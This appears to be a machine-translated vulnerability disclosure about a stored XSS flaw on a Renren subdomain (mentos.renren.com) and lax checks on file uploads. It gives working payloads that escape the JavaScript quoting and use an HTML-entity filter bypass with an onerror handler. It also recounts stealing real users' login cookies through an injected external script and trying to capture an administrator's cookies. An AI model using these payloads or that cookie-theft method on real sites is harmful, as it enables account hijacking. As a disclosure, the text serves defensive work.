Renren.com-a sub-station stored xss vulnerability and upload Problems

In the evening, Renren switched around and tested it. It found that a sub-station of Renren had a storage type xss, which could be used for background management blindly or steal others' login cookies (as proved ). There are also some problems with the upload location. I have done a preliminary test. Please check it carefully. Please do not give the rank of the single digit.
1. This is the vulnerability substation: http://mentos.renren.com/ 2. Upload the file and find that the characters at the title position are output in js. Decisively construct the xss code test, xss code: ', (function () {alert (1)} (), 'f12 looked at the source code, the 'code is filtered into' source code: <a href = "javascript: void (0)" onclick = "all_video_play (324,'', (function () {alert (1)} (), '', 0, '123 ',' http://v139.56img.com/images/28/5/coop_3000002383i56olo56i56.com_cw_137535892041hd.jpg ', 'U') "> </a> 1.png 3: Change 'to html Encoding & #39; and then write it. The xss code is: & amp; #39;, (function () {alert (1)} (), & amp; #39; F12. Let's take a look at it. Source code: <a href = "javascript: void (0)" onclick = "all_video_play (325,'', (function () {alert (1 )}()), '', 0 ,' http://yx.xnimg.cn/M04/22/1308/71/YJjIVnQrU36jai2aimQb63yi.ori.mp3 ',' http://yx.xnimg.cn/M04/62/41/41/ZrIJ3yZrmE3ejaINBjAFvmYz.ori.jpg ', 'M') "> </a> 4. Click here and try again. 5. Try to write "> <into the html & # mode, and find that the three characters are filtered twice as & quot; & gt; & lt; source code: <a href = "javascript: void (0)" onclick = "all_video_play (326,'') & quot; & gt; & lt; img src = 1 onerror = alert (22) & gt; ', 0 ,' http://yx.xnimg.cn/M02/22/1308/79/Zzq6vyB7Rz2uUNN3Yf6RvuAr.ori.mp3 ',' http://yx.xnimg.cn/M04/62/78/78/ym2emmbEB7niZNBnMbuyYfa2.ori.jpg ', 'M') "> </a> 6. Test whether there are other restrictions. Can you insert code that calls an external js file. The result indicates no pressure ~ 7. You can write code that steals user logon cookies. Although this is a click-type xss, it seems that the winning rate is still relatively high, probably because of the reason for playing the video or audio. Roar, I will receive a few in a short time, with different addresses. I am not very clear about the channels used in the recruitment. 8. You can successfully log on to another user's account and perform any operations at Will (please rest assured that I have not published or operated anything of the user ).

The Administrator does not know whether to leave work or be smart. After waiting for half an hour, the cookies managed are not obtained. Maybe because I inserted an alert (1) in front of it, and he noticed it. However, based on my previous experience in xss over the Internet, there must be no secondary xss filtering in the management background. Here, I will not wait for the Administrator cookie to log on to the background. However, there should be nothing in this background .. 9 there are also problems with uploading. You can upload illegal files to both the Image Location and video location. I wrote a TXT, and changed the suffix to xx.jpg, and then passed it directly...Solution:
1-to-2 filtering. 2. Determine the upload location.